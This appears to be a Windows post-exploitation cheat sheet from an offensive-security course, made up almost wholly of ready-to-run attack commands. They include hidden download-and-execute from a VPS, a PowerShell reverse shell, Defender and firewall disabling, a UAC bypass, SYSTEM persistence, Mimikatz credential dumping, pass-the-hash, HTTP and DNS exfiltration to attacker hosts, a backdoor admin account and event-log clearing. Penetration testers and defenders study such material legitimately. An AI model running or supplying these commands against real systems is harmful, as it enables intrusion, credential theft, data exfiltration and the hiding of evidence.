All course modules are free for self-learning. Tools and source code are paywalled. Study the theory, build the tools, understand the tradecraft.
# Identity & privileges whoami && whoami /groups && whoami /priv # System info (one-liner) systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # Network recon ipconfig /all && route print && netstat -ano # Running processes & services tasklist /svc && sc query | findstr SERVICE_NAME # Check for weak service permissions sc qc <service_name> accesschk.exe -uwcqv "Authenticated Users" * # Defender status check powershell -c "Get-MpComputerStatus | Select RealTimeProtectionEnabled, IsTamperProtected"
# Download & execute (IEX)
powershell -w hidden -c "iex(iwr http://VPS/payload.ps1)"
# HTA execution (phishing)
mshta http://VPS:8080/payload.hta
# Certutil download (stealthy - trusted MS binary)
certutil -urlcache -split -f http://VPS/payload.exe %TEMP%\svc.exe && %TEMP%\svc.exe
# One-liner reverse shell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('IP',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$s.Write(([Text.Encoding]::ASCII).GetBytes($o),0,$o.Length)}"
# Add Defender exclusions (ADMIN - works with Tamper Protection ON) Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:APPDATA # Verify exclusions (Get-MpPreference).ExclusionPath # Disable script scanning (ADMIN) Set-MpPreference -DisableScriptScanning $true # Disable real-time monitoring (ADMIN - may trigger alert) Set-MpPreference -DisableRealtimeMonitoring $true # Disable firewall (ADMIN) netsh advfirewall set allprofiles state off
# Execute from excluded path (after adding exclusions) iwr http://VPS/deployer.exe -OutFile $env:TEMP\svc.exe; & $env:TEMP\svc.exe # UAC bypass + execute (fodhelper) New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force; Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(Default)" -Value "cmd /c $env:TEMP\payload.exe"; Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value ""; Start-Process fodhelper.exe # Request UAC elevation (social engineering) Start-Process powershell -Verb RunAs -ArgumentList "-ep bypass -c iex(iwr http://VPS/payload.ps1)"
# Automated enumeration powershell -ep bypass -c "IEX(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1); Invoke-AllChecks" # ADMIN → SYSTEM via scheduled task (RECOMMENDED - works over remote) schtasks /create /tn SvcUpd /tr "$env:TEMP\svc.exe" /sc once /st 00:00 /ru SYSTEM /rl HIGHEST /f; schtasks /run /tn SvcUpd; schtasks /delete /tn SvcUpd /f # Exploit SeImpersonatePrivilege PrintSpoofer.exe -i -c cmd RoguePotato.exe -r 127.0.0.1 -e "cmd.exe" -l 9999 # Check for AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# USER level: Registry Run key reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WinSecurity /t REG_SZ /d "$env:APPDATA\svc.exe" /f # ADMIN level: Scheduled task (onlogon) schtasks /create /tn WinUpdate /tr "$env:APPDATA\svc.exe" /sc onlogon /ru SYSTEM /rl HIGHEST /f # SYSTEM level: Service sc create WinDefendSvc binPath= "C:\ProgramData\svc.exe" start= auto # SSH server (legitimate, hard to detect) Add-WindowsCapability -Online -Name OpenSSH.Server; Start-Service sshd; Set-Service -Name sshd -StartupType Automatic
# Mimikatz one-liner powershell -ep bypass -c "IEX(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds" # SAM/SYSTEM dump (for offline cracking) reg save HKLM\SAM sam.hiv; reg save HKLM\SYSTEM system.hiv # Find passwords in files findstr /si "password=" *.txt *.ini *.config *.xml # WiFi passwords netsh wlan show profiles netsh wlan show profile name="SSID" key=clear
# PSExec (requires admin creds) psexec \\TARGET -u DOMAIN\user -p password cmd # WMI remote execution wmic /node:TARGET /user:DOMAIN\user /password:pass process call create "cmd /c payload.exe" # PowerShell remoting Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user # Pass-the-Hash with Mimikatz sekurlsa::pth /user:Administrator /domain:TARGET /ntlm:HASH /run:cmd
# Upload via certutil (HTTP) certutil -urlcache -split -f http://VPS:8080/upload/%COMPUTERNAME%.txt C:\Windows\Temp\x # PowerShell upload Invoke-WebRequest -Uri http://VPS:8080/upload -Method POST -InFile C:\data\secrets.zip # DNS exfil (slow but stealthy) nslookup $(cat secret.txt | base64).attacker.com # SMB share (if accessible) copy C:\data\secrets.zip \\ATTACKER\share\
# Create undeletable files (SYSTEM ownership, locked ACLs)
1..10 | ForEach-Object { $f="C:\Users\victim\Desktop\PWNED$_.txt"; echo PWNED > $f; icacls $f /setowner SYSTEM; icacls $f /inheritance:r; icacls $f /grant SYSTEM:F }
# Add backdoor admin account
net user hacker P@ssw0rd123! /add; net localgroup Administrators hacker /add
# Encrypt files (ransomware demo - AUTHORIZED ONLY)
# Use with caution - only on test systems
# Leave evidence of access (authorized pentest)
echo "COMPROMISED BY [OPERATOR] - $(Get-Date)" > C:\Users\Public\PENTEST_PROOF.txt
# Remove scheduled tasks schtasks /delete /tn TaskName /f # Remove services sc delete ServiceName # Remove registry persistence reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v KeyName /f # Remove files Remove-Item $env:TEMP\*.exe -Force; Remove-Item $env:TEMP\*.ps1 -Force # Remove Defender exclusions Remove-MpPreference -ExclusionPath $env:TEMP # Clear event logs (SYSTEM required - very noisy) wevtutil cl Security; wevtutil cl System; wevtutil cl Application